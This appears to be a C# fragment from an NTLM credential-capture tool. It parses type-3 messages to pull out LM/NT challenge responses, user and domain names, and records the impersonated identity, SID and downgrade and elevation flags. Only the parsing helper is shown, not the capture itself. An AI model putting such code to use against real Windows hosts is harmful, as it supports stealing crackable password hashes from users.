/// <summary>
/// Appends <paramref name="response"/> to <c>Responses</c>, skipping entries
/// whose <c>Resp1</c> is reported empty by the <c>IsNullOrWhiteSpace()</c> extension.
/// </summary>
/// <param name="response">Parsed response to record; it is dereferenced without a null check.</param>
public void AddResponse(InternalMonologueResponse response)
{
    // Only responses that actually carry a first response value are kept.
    if (!response.Resp1.IsNullOrWhiteSpace())
    {
        Responses.Add(response);
    }
}
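/// <summary>
/// Parses an NTLM type-3 message and returns its LM/NT challenge responses,
/// domain and user name together with the supplied challenge.
/// </summary>
/// <param name="message">Raw bytes of the type-3 message.</param>
/// <param name="challenge">Challenge value; stored on the result unchanged.</param>
/// <returns>
/// A populated <see cref="InternalMonologueResponse"/>. <c>UserName</c>, <c>Domain</c>,
/// <c>Resp1</c> and <c>Resp2</c> are only set when the NT response is at least 24 bytes long.
/// </returns>
/// <remarks>
/// All lengths and offsets are taken from <paramref name="message"/> itself and are not
/// validated here. A message shorter than the 44-byte field header, or one whose descriptors
/// point outside the buffer, makes <see cref="BitConverter"/> or <see cref="Array.Copy(Array, long, Array, long, long)"/>
/// throw an <see cref="ArgumentException"/> (or a derived type), so treat the buffer as untrusted input.
/// </remarks>
private InternalMonologueResponse ParseNTResponse(byte[] message, string challenge)
{
    // Each field descriptor is a 16-bit length at its base offset followed,
    // four bytes later, by a 32-bit offset to the payload inside the message.
    ushort lmLength = BitConverter.ToUInt16(message, 12);
    uint lmOffset = BitConverter.ToUInt32(message, 16);
    ushort ntLength = BitConverter.ToUInt16(message, 20);
    uint ntOffset = BitConverter.ToUInt32(message, 24);
    ushort domainLength = BitConverter.ToUInt16(message, 28);
    uint domainOffset = BitConverter.ToUInt32(message, 32);
    ushort userLength = BitConverter.ToUInt16(message, 36);
    uint userOffset = BitConverter.ToUInt32(message, 40);

    byte[] lmResponse = new byte[lmLength];
    byte[] ntResponse = new byte[ntLength];
    byte[] domainBytes = new byte[domainLength];
    byte[] userBytes = new byte[userLength];

    // Array.Copy range-checks source and destination, so a descriptor that
    // points past the end of the message fails here instead of over-reading.
    Array.Copy(message, lmOffset, lmResponse, 0, lmLength);
    Array.Copy(message, ntOffset, ntResponse, 0, ntLength);
    Array.Copy(message, domainOffset, domainBytes, 0, domainLength);
    Array.Copy(message, userOffset, userBytes, 0, userLength);

    var result = new InternalMonologueResponse();
    result.NtlmDowngrade = downgrade;
    result.FromElevated = isElevated;
    result.Challenge = challenge;

    // WindowsIdentity wraps a token handle: fetch it once and dispose it,
    // rather than creating two identities and leaving both to the finalizer.
    using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
    {
        result.ImpersonatedIdentity = identity.Name;
        // NOTE(review): User may be null for some identities (e.g. anonymous) - confirm callers never hit that.
        result.SID = identity.User.ToString();
    }

    if (ntLength == 24)
    {
        // A 24-byte NT response: the LM and NT responses are stored side by side.
        result.UserName = ConvertHex(ByteArrayToString(userBytes));
        result.Domain = ConvertHex(ByteArrayToString(domainBytes));
        result.Resp1 = ByteArrayToString(lmResponse);
        result.Resp2 = ByteArrayToString(ntResponse);
    }
    else if (ntLength > 24)
    {
        // A longer NT response is split after its first 32 characters;
        // presumably ByteArrayToString emits two hex characters per byte,
        // which would make that the first 16 bytes - confirm against the helper.
        string ntText = ByteArrayToString(ntResponse);
        result.UserName = ConvertHex(ByteArrayToString(userBytes));
        result.Domain = ConvertHex(ByteArrayToString(domainBytes));
        result.Resp1 = ntText.Substring(0, 32);
        result.Resp2 = ntText.Substring(32);
    }

    // NT responses shorter than 24 bytes leave UserName, Domain, Resp1 and Resp2 unset.
    return result;
}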